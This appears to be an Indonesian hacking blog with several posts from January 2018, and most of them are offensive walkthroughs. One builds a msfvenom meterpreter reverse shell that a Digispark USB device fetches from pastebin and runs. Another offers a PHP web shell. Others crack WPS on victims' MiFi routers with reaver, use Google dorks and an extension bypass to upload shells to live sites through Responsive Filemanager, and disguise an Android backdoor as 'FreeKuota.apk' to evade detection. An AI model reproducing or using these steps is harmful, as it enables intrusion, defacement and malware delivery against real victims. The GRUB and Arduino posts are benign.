Senin, 15 Januari 2018

Exploit Bad USB With Rubber Ducky

Hallo friend...,
Selamat malam, kali ini gw mau share tentang HID Attack.
Semacam exploit bug usb gitu, kalo judul gw kan pake kata-kata "usb rubber ducky", tapi karena harga usb rubber ducky harganya mahal jadi kita akalin pake digispark mikrokontroler. Disini gw pake digispark attiny85 arduino, jadi jauh lebih murah ketimbang yang aslinya kwkwkwk

Lanjut, sebenernya banyak payload-payload yang dibuat hak5, kalian bisa liat disini.
ah disini yang gw pake itu payload Reverse Shell, oke simak aja tutor berikut ini

Bahan
  •  Mikrokontroler (Digispark)
  •  Arduino Software
  •  OS Kali Linux
Caranya.?
Tenang ini gw kasih tau caranya, pertama
Buat dulu script payloadnya dengan msfvenom, script ini yang nantinya akan di eksekusi oleh payload usb rubber ducky tersebut.

#msfvenom -p windows/meterpreter/reverse_tcp -f vbs --smallest LHOST=localip LPORT=portbebas -o Desktop/output.txt 

Kita buka file output.txt yang ada pada desktop, copykan scriptnya ke pastebin dan create new paste. Sebenarnya yang kita butuhkan cuma linknya doang, karena nanti di script arduinonya kita set agar mendownload dan menjalankan backdoor yg kita buat dan upload tadi. Nah ini kayak contoh punya saya 

https://pastebin.com/raw/DAS7jCJa
 
Jangan didownload gan itu local soalnya kwkwkwk..

Lanjut, kita buka arduino softwarenya dan copy paste code berikut


Nah itu code yang warna merah kalian ganti dengan link pastebin kalian. Inget, jangan colok dulu digisparknya dan pastikan driver digistump sudah diinstall. 
Nah kalau semua sudah siap tinggal kalian klik tanda ceklist kemudian klik upload.

Ok kalau sudah terupload, biasa deh kalian aktifkan metasploitnya dan lanjut eksekusi, gw rasa dah pada faham semuanya deh


Tuh gw kasih juga tutorial videonya, kalau masih kurang faham silahkan bertanya pada kolom komentar wkwkwk

Btw ini hanya untuk edukasi saja yah, jangan yang macem-macem, resiko di tanggung sendriri ...

THX !!!

NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami
    

Jumat, 12 Januari 2018

Mengembalikan Grub Kali Linux Setelah Install Windows

Hallo, selamat siang...

Postingan kali ini hanya catatan gw, laptop gw dualboot windows7 dan kali linux. Karena windows7 saya ngecrash, jadi saya install ulang + upgrade ke windows10 dan ternyata grub kali linux saya hilang, ya iyalah hilang, karena pas gw install grubnya gw setting dari grub linux bukan grub windows kayak easyBCD atau apalah. 

Setelah gw cari-cari dan ketemu cara fixnya, banyak kok blogger lain yang bahas ini. Lanjut, dan ternyata ketemu neeeh caranya.

Langsung caw
  - Siapkan bootable Kali Linux
  - Masuk ke Live System Kali Linux
  - Kemudian buka terminal dan ketik
    #fdisk -l
  - Cari partisi linux anda


Neeh kalo punya gw /dev/sda4

     #mount -t ext4 /dev/sda4 /mnt/
     #mount -t proc proc /mnt/proc
     #mount -t sysfs sys /mnt/sys
     #mount -o bind /dev/ /mnt/dev/ 
     #chroot /mnt /bins/bash 

Nah maka nanti akan masuk ke setingan terminal kali linux kalian, setelah itu langsung aja install grubnya 

     #grub-install /dev/sda
     #grub-install /dev/sda4   





Nah udah deh beres, reboot pc kalian dan cabut bootablenya, harusnya kalo kalian bener maka akan tampil grubnya

Thanx   

      

Rabu, 10 Januari 2018

Private Mini Shell Version 1.0

Hallo friend, 
Gw lagi sedih nih, jadi gw mau bagi-bagi mini shell nih
Ini gw recode sendiri, gw ngambil dari script shell T.I Sniper dan IndoXploit. Jadilah kayak gini 

Ini penampakannya



Ini login pagenya, default passwordnya "./Mruw4x21".





Nah ini tampilannya
Untuk fiturnya? yah namanya juga mini shell yah fiturnya dikit, di shell ini gw nambahin Console doang, biar bisa socket server. Untu bugnya? yah banyak lah, namanya manusia, apalagi noob kek gw wkwkwk :'V udah aha

Kalo mau comot aja nih
 
Link: PM-Shell_v1.php

Ok thanx
 
NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami

Selasa, 09 Januari 2018

Hack MiFi Dengan Wash and Reaver Kali Linux

Hallo Friend...

Kali ini gw mau share gimana cara hack MiFi, buat kalian para mahasiswa miskin kuota, neeh gw kasih tau gimana caranya nih.
Disini bahan praktek gw MiFi M3Z Andromax, teknik ini memanfaatkan celah keamanan WPS Pin, sistem kerjanya sederhana dengan membruteforce 4 digit dari pin wpsnya kemudian merequest password dari pin yg didapat dan pasti akurat. Ini bukan termasuk kedalam bruteforce atau evil twin attack kaya fluxion/linset, yah memang brutefoce tapi pin yg di bruteforce jadi pasti akurat karena pin itu full angka jadi pasti dapet, asalkan WPS MiFinya aktif.

Langsung lah
Aktifkan monitor mode 

   #airmon-ng check kill
   #airmon-ng start wlan1

Btw gw pake adapter eksternal, karena adapter internalku frekuensi dBmnya lemah.
Okeh, lanjut jalankan wash untuk mengetahui apakah router victim memiliki celah wps atau tidak, kalo ada nanti akan tampil detail dari router tersebut, ketikan perintah berikut

   #wash -i wlan1mon



Kemudian coba kita exploit, ketik perintah berikut

   #reaver -i  wlan1mon -b (bssid) -c (channel) -vv -K 1



Kalo udah dapet WPS Pin, itu artinya kita sudah ketemu kuncinya tinngal, tinggal kita coba buka deh pintunya wkwkwkw :'V

   #reaver -i  wlan1mon -b (bssid) -c (channel) -p (wps_pin) -vv 


Nah dapet deh passwordnya, Lolipop21.
Neeh kalo kurang jelas gw kasih video tutornya, kurang apa lagi coba..? wkwkwk :'V


Sorry garing, gak ada musiknya kwkwkw

NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami

Rabu, 03 Januari 2018

Cara Install Arduino + Digistump Driver Digispark

*~..Happy New Year..~*

Hallo friend, kali ini gw mau share sesuai judul di atas.
Jujur gw baru belajar arduino, kenapa harus diinstall digistump? karena gw mau ngexplore digispark, apasih digispark tuh? itu mikrocontroler. Oke langsung aja lah

Bahan
  • Kali Linux
  • Arduino Software (DISINI)
Next, kalian download dulu arduinonya
Setelah itu ekstrak filearduinonya
Kalau udah masuk ke folder arduino hasil ekstrak tadi

  #cd arduino/

Setelah itu, setting permission install.sh jadi full control

  #chmod +x install.sh

Lalu jalankan proses install

  #./install.sh

Tunggu proses pembuatan icon desktop sebentar , kalo udah beres double click icon arduino IDE di desktop dan taraaaaa jalan dah




Okeh selanjutnya install digistumpnya, buka arduino IDEnya
Setelah jalan klik file > pereferences Kemudian copy paste url berikut:
  • http://digistump.com/package_digistump_index.json
Ke textarea Additional Boards Manager URLs


Next kita ke tools > Board > Boards managers 
Lanjut ganti type dari All jadi contributed, terus pilih Arduino AVR Boards dan klik install

Udah de beres, tinggal lanjut explore aja deh
Ini video tutornya biar lebih jelas


Ok, semoga bermanfaat
Thanx

Selasa, 02 Januari 2018

Deface Dengan Responsive Filemanager

*~.Happy New Year.~*

Hallo guys, kali ini gw mw sharing cara deface neh, 
Sebenernya gw bukan defacer sih, ini juga live targetnya gw dapet dari temen.

Nick: swal0w 

Tuh kalo mau tau dia, gw dikasih live target + diajarin deface. Ok langsung aja, cukup curhatnya
Next, kalian cari sendiri live targetnya

Dork
inurl:/filemanager intext:index of
inurl:assets/filemanager intext:index of
inurl:/js/filemanager/ "index of"
 
Exploit
/filemanager/dialog.php

Oke, silahkan kalian dorking, kalo udah ketemu satu web 

contoh: www.target.co.li
 
coba kalian exploit dengan menambahkan /filemanager/dialog.php ibelakang linknya

contoh: www.target.co.li/filemanager/dialog.php

Kalo vuln nanti bakal kek gini





Nah, kalo udah kayak gini kita tanam shell, biasanya kalo RFM tidak bisa mengupload file dengan format .php
Maka caranya cukup dengan bypass extensi / tamper data. Disini gw pake teknik yg bypass ext, jadi shell.php.fla. Habis itu gw upload dah 


Untuk Mengaksesnya cukup klik kanan dan klik show url, nanti akan muncul link dan paste di browser 


Silahkan login





Wokeh, kalo udah keupload ya terserah mau diapain. Kalo saran gw sih jangan dirusak gan, kasian wkwkwk

NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah       sekedar pengetahuan dan edukasi. Penyalahgunaan di 
    luar tanggung jawab kami  Thanx 
   
   




Senin, 01 Januari 2018

Cara Ganti Nama Backdoor Android Dengan Apktool Linux

*-.Happy New Year .-*

Hallo friend,
Kali ini gw mau share gimana caranya ngubah nama backdoor android. Buat kalian yang hobi exploit jaringan pasti pengen sebisa mungkin agar backdoor kalian tidak terdeteksi oleh antivirus atau bahkan oleh user secara kasap mata, entah kalian gunakan undetect backdoor, hide backdoor atu apalah yang penting gk ketahuan. Nah disini gw punya satu trik sederhana mengubah nama backdoor android dengan apktool, agar backdoor kalian tidak mudah terdeteksi dengan mudah. Okeh next aja

Bahan :
  • Apktool
  • Msfvenom / Generate Backdoor Lainya 
  • Metasploit
  • Text Editor
Next :

Pertama kita buat backdoornya dengan msfvenom atau tools pembuat backdoor lainnya bebas, kalo gw make msfvenom

 
nb:
  lhost   : ip attacker
  lport   : port attacker (bebas)
  Hack.apk: nama output (bebas)

Ok, nanti kalian dapat file output dengan format .apk, kalau udah kita decompile file .apk tersebut menggunakan apktool

  #apktool d Hack.apk


Nanti nongol folder baru dengan nama sesuai nama file .apknya


Next, masuk ke foldernya, cari file dengan nama AndroidManifest.xml dan buka filenya Kemudian cari kata-kata android:label atau bisa juga android:name untuk mengetahui nama file yang menyimpan file script desain nama dari apk backdoor kita, gunakan CTRL+F untuk mempermudah pencarian




Nah dah ketemu, disitu dapat dilihat android:label="@string/app_name", ini menandakan bahwa file script mempunyai nama string.xml dan label app_nam. Biasanya ada pada lokasi /res/value/string.xml



Kalo udah ketemu, buka filenya kemudian cari kata app_name


Kemudian silahkan ganti nama backdoornya (bebas) dan save
Kalo udah di ganti kita compile lagi file backdoornya

  #apktool b -o newname.apk folder_decompile
  #apktool b -o FreeKuota.apk Hack



 Ok, kalau udah sampe sini kita signapk dulu backdoornya, agar dapat di install di perangkat target, silahkan kalian download sendiri SignApknya atau kalo mau ke gw pm/comment wkwkwkw
ketikkan perintah berikut

#java -jar signapk.jar testkey.x509.pem testkey.pk8 <apk_asli.zip> <output.zip>

#java -jar signapk.jar testkey.x509.pem testkey.pk8 FreeKuota.apk FK.apk


Dan akan keluar file output baru deh



Ok selesai, tinggak send ke victim dan exploit deh, nanti nama backdoornya berubah deh bukan main activity lagi


 yak berubah namanya

Ini gambar exploitnya


Nah, kira-kira gitulah

Semoga 2018 ini gw makin jaya 
Thank

NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami